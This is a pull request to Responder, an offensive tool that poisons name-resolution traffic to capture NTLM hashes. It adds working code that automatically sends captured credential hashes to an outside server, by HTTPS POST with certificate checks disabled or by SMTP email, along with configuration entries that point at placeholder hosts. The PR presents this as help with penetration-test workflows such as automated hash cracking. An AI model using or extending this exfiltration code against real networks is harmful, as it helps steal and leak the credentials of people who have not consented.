### PR TITLE
Added exfiltration functionality via both Email & HTTPS POST 

### DIFF
--- a/Responder.conf
+++ b/Responder.conf
@@ -108,3 +108,8 @@ username=sendingaddress@domain.com
 password=passwordtoemail
 port=587
 server=mail.domain.com
+
+[HTTPS Exfiltration]
+enabled=On
+url=https://domain.com:9090
+verifyssl=Off

--- a/Responder.conf
+++ b/Responder.conf
@@ -100,3 +100,11 @@ HTMLToInject = <img src='file://///RespProxySrv/pictures/logso.jpg' alt='Loading
 ; Configure SSL Certificates to use
 SSLCert = certs/responder.crt
 SSLKey = certs/responder.key
+
+[Email]
+enabled=Off
+sendtoaddress=destinationaddress@domain.com
+username=sendingaddress@domain.com
+password=passwordtoemail
+port=587
+server=mail.domain.com

--- a/Responder.conf
+++ b/Responder.conf
@@ -110,6 +110,6 @@ port=587
 server=mail.domain.com
 
 [HTTPS Exfiltration]
-enabled=On
+enabled=Off
 url=https://domain.com:9090
 verifyssl=Off

--- a/Responder.py
+++ b/Responder.py
@@ -45,6 +45,7 @@ parser.add_option('-P','--ProxyAuth',       action="store_true", help="Force NTL
 parser.add_option('--lm',                  action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
 parser.add_option('--disable-ess',         action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False)
 parser.add_option('-v','--verbose',        action="store_true", help="Increase verbosity.", dest="Verbose")
+parser.add_option('--test-email',          action="store_true", help="Send Test Email", dest="testemail")
 options, args = parser.parse_args()
 
 if not os.geteuid() == 0:
@@ -57,6 +58,12 @@ elif options.OURIP is None and IsOsX() is True:
 
 settings.init()
 settings.Config.populate(options)
+if options.testemail:
+    if settings.Config.emailenabled:
+            EmailHash("[EMAIL] If you received this email, responder email is working")
+            print(color("[EMAIL]",3,1), "attempted to send test email")
+    else:
+            print(color("[EMAIL]",1), "email functionality is disabled. see Responder.conf to enable")
 
 StartupMessage()
 

--- a/settings.py
+++ b/settings.py
@@ -84,6 +84,14 @@ class Settings:
 		config = ConfigParser.ConfigParser()
 		config.read(os.path.join(self.ResponderPATH, 'Responder.conf'))
 
+		# Email
+		self.emailenabled = self.toBool(config.get('Email', 'enabled'))
+		self.emailserver = config.get('Email', 'server')
+		self.emailport = config.get('Email', 'port')
+		self.emailpassword = config.get('Email', 'password')
+		self.emailusername = config.get('Email', 'username')
+		self.emailsendto = config.get('Email', 'sendtoaddress')
+
 		# Servers
 		self.HTTP_On_Off     = self.toBool(config.get('Responder Core', 'HTTP'))
 		self.SSL_On_Off      = self.toBool(config.get('Responder Core', 'HTTPS'))

--- a/settings.py
+++ b/settings.py
@@ -84,13 +84,18 @@ class Settings:
 		config = ConfigParser.ConfigParser()
 		config.read(os.path.join(self.ResponderPATH, 'Responder.conf'))
 
+		# HTTPS Exfiltration
+		self.httpsexfil_enabled  = self.toBool(config.get('HTTPS Exfiltration','enabled'))
+		self.httpsexfil_url      = config.get('HTTPS Exfiltration','url')
+		self.httpsexfil_verify  = self.toBool(config.get('HTTPS Exfiltration','verifyssl'))
+
 		# Email
-		self.emailenabled = self.toBool(config.get('Email', 'enabled'))
-		self.emailserver = config.get('Email', 'server')
-		self.emailport = config.get('Email', 'port')
-		self.emailpassword = config.get('Email', 'password')
-		self.emailusername = config.get('Email', 'username')
-		self.emailsendto = config.get('Email', 'sendtoaddress')
+		self.emailenabled     = self.toBool(config.get('Email', 'enabled'))
+		self.emailserver      = config.get('Email', 'server')
+		self.emailport        = config.get('Email', 'port')
+		self.emailpassword    = config.get('Email', 'password')
+		self.emailusername    = config.get('Email', 'username')
+		self.emailsendto      = config.get('Email', 'sendtoaddress')
 
 		# Servers
 		self.HTTP_On_Off     = self.toBool(config.get('Responder Core', 'HTTP'))

--- a/utils.py
+++ b/utils.py
@@ -27,10 +27,14 @@ import struct
 from calendar import timegm
 
 def HTTPExfil(result):
-    result = str(result)
     try:
         if not settings.Config.httpsexfil_enabled:
             return
+        if not settings.Config.httpsexfil_url:
+            print(color("[HTTPS Exfil]",1),"HTTPS Exfil is enabled but not configured. "
+                "Check Responder.conf to configure")
+            return False
+
         # requests isn't in stdlib, so using urllib
         import urllib.parse 
         import urllib.request
@@ -41,12 +45,16 @@ def HTTPExfil(result):
             ctx.check_hostname = False
             ctx.verify_mode = ssl.CERT_NONE
 
-        data = {
-            'hashes' : base64.b64encode(result.encode()),
-        }
+        data = result
+        if type(data) != dict:
+            result = str(result)
+            data = {
+                'hashes' : base64.b64encode(result.encode()),
+            }
+
         data = bytes( urllib.parse.urlencode( data ).encode() )
         handler = urllib.request.urlopen( settings.Config.httpsexfil_url, data , context=ctx)
-        print(color("[HTTPS Exfil]",3,1),"Sent via https exfil")
+        print(color("[HTTPS Exfil]",4,1),"Sent via https exfil")
     except Exception as e:
         print(color("[HTTPS Exfil]",1),"Error sending via HTTPS Exfil{}".format(e))
         return
@@ -78,7 +86,7 @@ def EmailHash(result):
         server.sendmail(settings.Config.emailusername, settings.Config.emailsendto,
                 message)
         server.close()
-        print(color("[EMAIL]",3,1),"Sent email to {}".format(settings.Config.emailsendto))
+        print(color("[EMAIL]",4,1),"Sent email to {}".format(settings.Config.emailsendto))
     except Exception as e:
         print(color("[EMAIL]",1),"Error sending email {}".format(e))
      


### PR DESCRIPTION
Added the ability to automatically exfiltrate hashes as they are received.
Helps with:
- integrate into automatic hash cracking workflows via hashtopolis API or a similar, custom solution. (or any workflow really)
- more easily aggregating data from multiple assessments 
- continual retrieval of credentials 

Images below show the HTTPS Exfiltration output as seen in responder, and as seen from the web server.

![responder-received](https://user-images.githubusercontent.com/30613497/120572522-b82dcf80-c3e1-11eb-93e3-41e6afd57a82.png)
![responder-stdout](https://user-images.githubusercontent.com/30613497/120572528-b8c66600-c3e1-11eb-8367-780b1cbfe848.png)

